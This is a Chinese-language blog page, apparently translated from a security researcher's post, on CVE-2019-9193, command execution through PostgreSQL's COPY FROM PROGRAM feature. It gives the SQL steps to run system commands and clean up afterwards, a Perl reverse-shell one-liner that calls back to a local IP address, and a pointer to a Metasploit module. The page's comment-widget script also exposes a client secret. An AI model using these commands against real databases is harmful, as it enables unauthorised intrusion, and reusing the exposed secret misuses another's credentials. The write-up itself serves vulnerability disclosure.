<!--
	作者：Sariay
	时间：2018-09-25
	描述：There may be a bug, but don't worry, QiLing(器灵) says that it can work normally!
-->


	<!DOCTYPE html>
	<html>
		

<head><meta name="generator" content="Hexo 3.8.0">
	<title>PostgreSQL 9.3上经过身份验证的任意命令执行漏洞 (CVE-2019-9193)</title>
	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta name="apple-mobile-web-app-title" content="Amaze UI">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">
    <meta name="author" content="miraitowa">
    <meta name="keywords" content="">
    <meta name="description" content="">
   	<!-- css -->
	<link rel="stylesheet" href="/css/style.css">

	<!-- favicon -->
	<link href="/img/favicon.ico" rel="Shortcut Icon" type="image/ico">
	
	<!-- font-awesome -->
	<link href="https://cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
</head>

	<body>	
		<!--Preloader-->
<div id="preloader">
	<div id="status">
		<img alt="PRELOADER" src="/img/logo.png">
	</div>
</div>
<!--Preloader end-->

<!-- header -->

	<header id="header-bg-2">

	
		<div id="cd-logo"><a href="/"><img src="/img/logo.png" alt="Logo"></a></div>
	
	
	<!-- motto or description -->
		
 		<p class="motto"></p>
	
	
	<!-- current page name or title -->
	
		
		
			
			<p class="page-name">当前文章&nbsp;:&nbsp;《PostgreSQL 9.3上经过身份验证的任意命令执行漏洞 (CVE-2019-9193)》</p>
			
		
	
	
	<!-- others: such as change-bg, time... -->
	<p class="page-name-other">
		11/28/2019 
		<style type="text/css">
	header:after {
		content: '';
		position: relative;
		top: 0;
		left: 0;
		height: 100%;
		width: 100%;
		background: #222222;
		opacity: .5;
		z-index: -1;
	}
	
	.change-header-bg{
		font-style: normal;
	}
	.change-header-bg i{
		text-align: center;
		cursor: pointer;
		pointer-events: bounding-box;
	}
	@media(max-width:512px) {
		.change-header-bg {
			display: none;
			visibility: hidden;
		}
	}
	
</style>

<script type="text/javascript">
	function changeHeaderBg(){
		var random_bg = Math.floor(Math.random() * 109 + 1);
		var bg = 'url(https://miraitowa.github.io/Random-img/' + random_bg + '.jpg)';
		$("#header-bg-2").css("background-image", bg);
	}
</script>

<span class="change-header-bg">
	——&nbsp;<i class="fa fa-camera-retro" onclick="changeHeaderBg()"></i>	
</span>
	</p>		
</header>

<!-- nav -->
<div id="cd-nav">
	<a href="#0" title="menu" class="cd-nav-trigger"><span></span></a>

	<nav id="cd-main-nav">
		<ul>
			
      		<li class="fa fa-/">
           		<a href="/" title="主页">主页</a>	
      		</li>
    		
      		<li class="fa fa-/archives">
           		<a href="/archives" title="归档">归档</a>	
      		</li>
    		
      		<li class="fa fa-/categories">
           		<a href="/categories" title="分类">分类</a>	
      		</li>
    		
      		<li class="fa fa-/gallery">
           		<a href="/gallery" title="相册">相册</a>	
      		</li>
    		
      		<li class="fa fa-/about">
           		<a href="/about" title="关于">关于</a>	
      		</li>
    		
      		<li class="fa fa-/tags">
           		<a href="/tags" title="友链">友链</a>	
      		</li>
    		
    		
        	
		</ul>
	</nav>
</div>

		<!--main-->
		<main> 
		<div class="page-container">
		<!-- content srart -->
<div class="am-g am-g-fixed blog-fixed blog-content">
	<div class="am-u-md-8 am-u-sm-12">

		<article class="am-article blog-article-p">

			<div class="am-article-hd">
				


				<h1 class="am-article-title blog-text-center">
					
					
	
		<a href="/2019/03/22/PostgreSQL 9.3上经过身份验证的任意命令执行/" itemprop="url">		
			PostgreSQL 9.3上经过身份验证的任意命令执行漏洞 (CVE-2019-9193)		
		</a>
	

				</h1>

				<p class="am-article-meta blog-text-center">
					<span>
						<i class="fa fa-clock-o"></i> 
						<a href="/2019/03/22/PostgreSQL 9.3上经过身份验证的任意命令执行/" itemprop="url">
	<time datetime="2019-03-22T10:00:49.202Z" itemprop="datePublished">
  		2019-03-22
  </time>
</a>    
&nbsp;
					</span>
					
					<span>						
						
					</span>
				</p>
			</div>

			<div class="am-article-bd">
				<div class="content" id="post-content">
					
						<h2 id="PostgreSQL-9-3上经过身份验证的任意命令执行漏洞-CVE-2019-9193"><a href="#PostgreSQL-9-3上经过身份验证的任意命令执行漏洞-CVE-2019-9193" class="headerlink" title="PostgreSQL 9.3上经过身份验证的任意命令执行漏洞 (CVE-2019-9193)"></a>PostgreSQL 9.3上经过身份验证的任意命令执行漏洞 (CVE-2019-9193)</h2><p>原文链接：<a href="https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5" target="_blank" rel="noopener">https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5</a></p>
<p><img src="https://i.imgur.com/N6KNv2x.jpg" alt=""></p>
<p>PostgreSQL，俗称Postgres，是世界上最大，最受欢迎的数据库系统之一。它是Mac OSX的主要数据库，同时也有Linux和Windows版本。</p>
<p>今天，我将讨论一个漏洞（CVE-2019-9193），它能使某些数据库用户利用Postgres实现任意代码执行。</p>
<p>这个漏洞几乎影响了PostgreSQL的所有版本（从9.3到最新的11.2），同时也影响了所有的操作系统：<strong>Windows，Linux和Mac。</strong></p>
<p>从版本9.3开始，Postgres新增了一个<a href="https://paquier.xyz/postgresql-2/postgres-9-3-feature-highlight-copy-tofrom-program/" target="_blank" rel="noopener">“COPY TO/FROM PROGRAM”</a>功能。这个功能简单来说就是允许数据库的超级用户</p>
<p>以及<code>pg_read_server_files</code>组中的任何用户执行操作系统命令。这就意味着数据库的超级用户与运行数据库的用户在操作系统上拥有相同的权限。</p>
<p><img src="https://i.imgur.com/3Ji3QH5.png" alt=""></p>
<p>这种缺乏权限分离的设定，我们早在2000年左右就能看到，例如，<code>Microsoft SQL Server</code>中看到，在默认情况下启用了xp_cmdshell功能。</p>
<p>直到<code>Microsoft SQL Server 2005</code>中对此进行了修补和禁用，但有趣的是，相同的错误一直在不断重复的。</p>
<p><img src="https://i.imgur.com/CrEpKUN.png" alt=""></p>
<p>这种错误/缺陷/功能/漏洞介于提权和任意代码执行之间，因为在利用它之前需要数据库的某种身份验证。当然，攻击者也有可能通过SQL注入来实现。无论哪种情况，只有超级用户或具有“pg_read_server_files”权限的用户都才能执行系统命令。</p>
<p>要执行攻击，只需按照以下步骤操作：</p>
<blockquote>
<p>1）[可选]删除要使用的表（如果已存在）</p>
<p><code>DROP TABLE IF EXISTS cmd_exec</code>;</p>
<p>2）创建要保存命令输出的表</p>
<p><code>CREATE TABLE cmd_exec（cmd_output text）</code>;</p>
<p>3）通过<code>COPY FROM PROGRAM</code>功能运行系统命令</p>
<p><code>COPY cmd_exec FROM PROGRAM&#39;id&#39;</code>;</p>
<p>4）[可选]查看结果</p>
<p><code>SELECT * FROM cmd_exec</code>;</p>
<p>5）[可选]清理痕迹</p>
<p><code>DROP TABLE IF EXISTS cmd_exec</code>;</p>
</blockquote>
<p><img src="https://i.imgur.com/1QmOBQg.png" alt=""></p>
<p>请注意，在原本命令中的任何单引号必须是双引号才能转义它们，因此例如，如果要运行：</p>
<p><code>echo&#39;hello&#39;</code>;</p>
<p>你需要将它放在单引号内，然后用双引号替换所有单引号：</p>
<pre><code>&#39;echo&#39;&#39;hello&#39;&#39;;&#39;
</code></pre><p>我已在Postgres可运行的所有操作系统上进行了测试，都以反弹回一个shell为目标，这个shell的权限如下：</p>
<blockquote>
<ol>
<li>Windows - NT AUTHORITY / NETWORK SERVICE（低私有）</li>
<li>Linux - postgres（低私有）</li>
<li>Mac - 安装postgres的用户（通常是管理员）</li>
</ol>
</blockquote>
<p>Linux和Mac OSX通常可以通过perl one liner使用，其命令如下：</p>
<blockquote>
<p>COPY files FROM PROGRAM’perl -MIO -e’’$ p = fork; exit，if（$ p）; $ c = new IO :: Socket :: INET（PeerAddr，“192.168.0.104:80”）; STDIN- fdopen（$ c，r）; $〜 - fdopen（$ c，w）; system $ _ while &lt;&gt;;’’’;</p>
</blockquote>
<p>当然，我还有更简单的方法。我制作了一个新的<a href="https://github.com/Greenwolf/postgres_cmd_execution_nine_three" target="_blank" rel="noopener">Metasploit模块</a>（应尽快合并到主框架中）来简化开发过程，因为原本的<code>postgres_payload</code>模块只能在版本8之前工作</p>
<p><code>postgres_cmd_execution_nine_three.rb</code>会自动执行上述所有操作，如果你提供的话它具有有效的数据库凭据，具有正确的权限。对于SQL注入，您必须采用手动进行操作。</p>
<p><img src="https://i.imgur.com/sXCGdm9.png" alt=""></p>
<p><img src="https://i.imgur.com/DsZNciv.png" alt=""></p>
<p>但是对于Windows，<code>NETWORK SERVICE</code>用户似乎没有任何写权限，但仍然可以使用PowerShell来反弹shell。</p>
<p>我们可以使用me tasploit来生成Powershell编写的反弹shell语句，再带入上述模块中的COMMAND变量。请注意，要使用反斜杠来转义单引号。</p>
<p><img src="https://i.imgur.com/VNA2SIC.png" alt=""></p>
<p><img src="https://i.imgur.com/fKwe2bZ.png" alt=""></p>
<p><img src="https://i.imgur.com/DcfUYzu.png" alt=""></p>
<p>我希望你发现这项新技术对你很有帮助。</p>

					
				</div>
			</div>
		</article>

		<ul class="am-pagination">
    
    	<li class="am-pagination-prev">
   		<a class="pull-left" href="/2019/03/26/域名（第1部分）/" title="OSINT Primer：域名（第1部分）">
      		&laquo; 上一篇
		</a>
		</li>
	
	
		<li class="am-pagination-next">
		<a class="pull-right" href="/2019/03/21/Google Hacking/" title="Google Hacking">
			下一篇 &raquo;
		</a>
		</li>
	 
 </ul>
        

		<div class="theme-annie-comment-button-container">
	<button id="annie-comment-button" class="theme-annie-comment-button" onclick="Annie_Comment()">
		加载评论
		<!--加载评论-->
	</button>
</div>

<div id="annie-comment-container" class="theme-annie-comment-main-container">

	
		
			<!-- comment gitalk -->
			<!-- show gitalk comment -->

  <div id="gitalk-container"></div>


<!-- gitalk`s css & js -->
<link rel="stylesheet" href="https://unpkg.com/gitalk/dist/gitalk.css">
<link rel="stylesheet" href="/css/comment.css">
<script src="https://cdn.bootcss.com/blueimp-md5/2.10.0/js/md5.min.js"></script>
<script src="https://unpkg.com/gitalk/dist/gitalk.min.js"></script>

<script type="text/javascript">
	//thanks O-R
	//https://github.com/gitalk/gitalk/issues/102#issuecomment-382970552
	//去除尾部匹配正则数组的字符串  
	//remove redundant characters
	String.prototype.trimEnd = function(regStr) {
		var result = this;
		if(regStr == undefined || regStr == null || regStr == "") {
			return result;
		}
		var array = regStr.split(',');

		if(array.length > 0) {

			var c = array.shift();
			var str = this;
			var i = str.length;
			var rg = new RegExp(c);
			var matchArr = str.match(rg);

			if(matchArr != undefined && matchArr != null && matchArr.length > 0) {
				var matchStr = matchArr[0].replace(/\\/g, "\\\\").replace(/\*/g, "\\*")
					.replace(/\+/g, "\\+").replace(/\|/g, "\\|")
					.replace(/\{/g, "\\{").replace(/\}/g, "\\}")
					.replace(/\(/g, "\\(").replace(/\)/g, "\\)")
					.replace(/\^/g, "\\^").replace(/\$/g, "\\$")
					.replace(/\[/g, "\\[").replace(/\]/g, "\\]")
					.replace(/\?/g, "\\?").replace(/\,/g, "\\,")
					.replace(/\./g, "\\.").replace(/\&/g, "\\&");
				matchStr = matchStr + '$';
				result = str.replace(new RegExp(matchStr), "");
			}

			if(array.length > 0) {
				return result.trimEnd(array.join())
			} else {
				return result;
			}
		}
	};

	//create gitalk
	var gitalk = new Gitalk({
		clientID: '74a83cc9b15a1cf53e10',
		clientSecret: 'b62af8b132c33178adcb0098e2315806e2e57cae',
		//id: window.location.pathname,
		// id: (window.location.pathname).split("/").pop().substring(0, 49),
		id: md5(location.href.trimEnd('#.*$,\\?.*$,index.html$')),
		repo: 'Annie-Gitalk',
		owner: 'miraitowa',
		admin: 'miraitowa',
		distractionFreeMode: 'true',
	})
	gitalk.render('gitalk-container');
</script>
		
	

</div>

<script type="text/javascript">
	/* Show Comment */
	var Annie_Comment = function() {
		function Show_Hidden(obj) {
			obj.style.display = 'block';
		}
		
		//var obutton = $('#annie-comment-button');
		//var obutton = $('#annie-comment-container');
		var obutton = document.getElementById("annie-comment-button" || "0");
		var odiv = document.getElementById("annie-comment-container");
		if( 'obutton' ) {
			obutton.onclick = function() {
				Show_Hidden(odiv);
				$("#annie-comment-button").css("display", 'none');
				return false;
			}
		}
	};

	(function Annie_Init() {
		Annie_Comment();
	})();
</script>
		
		<!--
	时间：2018-09-24
	描述：The TOC module refers to 'https://github.com/codefine/hexo-theme-mellow', include toc.ejs、toc.js、toc.css. All rights reserved by codefine. 
-->

	
		<aside class="post-widget">
			<nav class="post-toc-wrap" id="post-toc">
				
					<strong>文章目录</strong>
				
				
				<!--toc(post.content)-->
				<ol class="post-toc"><li class="post-toc-item post-toc-level-2"><a class="post-toc-link" href="#PostgreSQL-9-3上经过身份验证的任意命令执行漏洞-CVE-2019-9193"><span class="post-toc-text">PostgreSQL 9.3上经过身份验证的任意命令执行漏洞 (CVE-2019-9193)</span></a></li></ol>
			</nav>
			<div class="post-toc-bar"><div>
		</div></div></aside>
	

	</div>
</div>
		</div>
		</main>
		
		<!--footer-->
		<footer>
	<div class="blog-text-center">
		<div class="theme-annie-social">
				
				
					<a href="https://github.com/miraitowa" title="Github" target="_blank"><i class="fa fa-github"></i>&nbsp;</a>
					
				
				
					<a href="https://miraitowa.github.io/about/" title="Email" target="_blank"><i class="fa fa-envelope-o"></i>&nbsp;</a>
					
					
						
				
		</div>
	</div>

	<div class="blog-text-center">
		<div class="theme-annie-copyright">
			
				&copy; 2018 11 11 - 2019, content by miraitowa. All Rights Reserved.			       	
			
		</div>
	</div>

	<div class="blog-text-center">
		<div class="theme-annie-copyright">
			<a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> Theme <a href="https://github.com/Sariay/hexo-theme-Annie" title="Annie" target="_blank" rel="noopener">Annie</a> by Sariay.		
		</div>
	</div>
</footer>
		<!-- <script src="http://code.jquery.com/jquery-2.1.1.min.js" type="text/javascript"></script> -->

<script>
	window.jQuery || document.write('<script src="/js/jquery-2.1.1.min.js"><\/script>')
</script>

<style>
	.motto {
		color: #000000;
		font-size: 20px;
		margin: 100px 25% 0;
		width: 50%;
		line-height: 1.4;
		font-family:"KaiTi", "STXingkai", "Source Sans Pro", "Segoe UI", "Lucida Grande", Helvetica, Arial, "Microsoft YaHei", FreeSans, Arimo, "Droid Sans", "wenquanyi micro hei", "Hiragino Sans GB", "Hiragino Sans GB W3", FontAwesome, sans-serif;
		text-align: center;
	}
	@media(max-width: 890px) {
		.motto {	
			margin: 100px 10% 0;
			width: 80%;
		}
	}
	@media(max-width: 890px) {
		.motto {
			margin: 100px 5% 0;
			width: 90%;
		}
	}
</style>


	<script src="/js/motto.js"></script>
	<script type="text/javascript">
		$(".motto").html(getMingYanContent());
	</script>	







	<script type="text/javascript" src="/js/toc.js"></script>


<script type="text/javascript" src="/js/main.js"></script>

<script type="text/javascript">
	//generate a random img that pre_name 'from 0 to 110'
	var random_bg = Math.floor(Math.random() * 109 + 1);

	//var bg = 'url(/img/random/' + random_bg + '.jpg)';		
	var bg = 'url(https://miraitowa.github.io/Random-img/' + random_bg + '.jpg)';

	$("#header-bg-2").css("background-image", bg);
</script>
		
		<!--back to top-->
        <style type="text/css">
	#totop {
		background: white;
		border-radius: 50%;
		position: fixed;
		right: 5.4%;
		bottom: 80px;
		cursor: pointer;
	}
	
	#totop a {
		color: #474747;
		background-color: transparent;
		padding: 10px;
		text-decoration: none;
	}
	
	@media(max-width:512px) {
		#totop {
			display: none;
			visibility: hidden;
		}
	}
</style>


	<div id="totop">
  		<a href="javascript:;" class="fa fa-arrow-up"></a>
	</div>

	</body>
	</html>

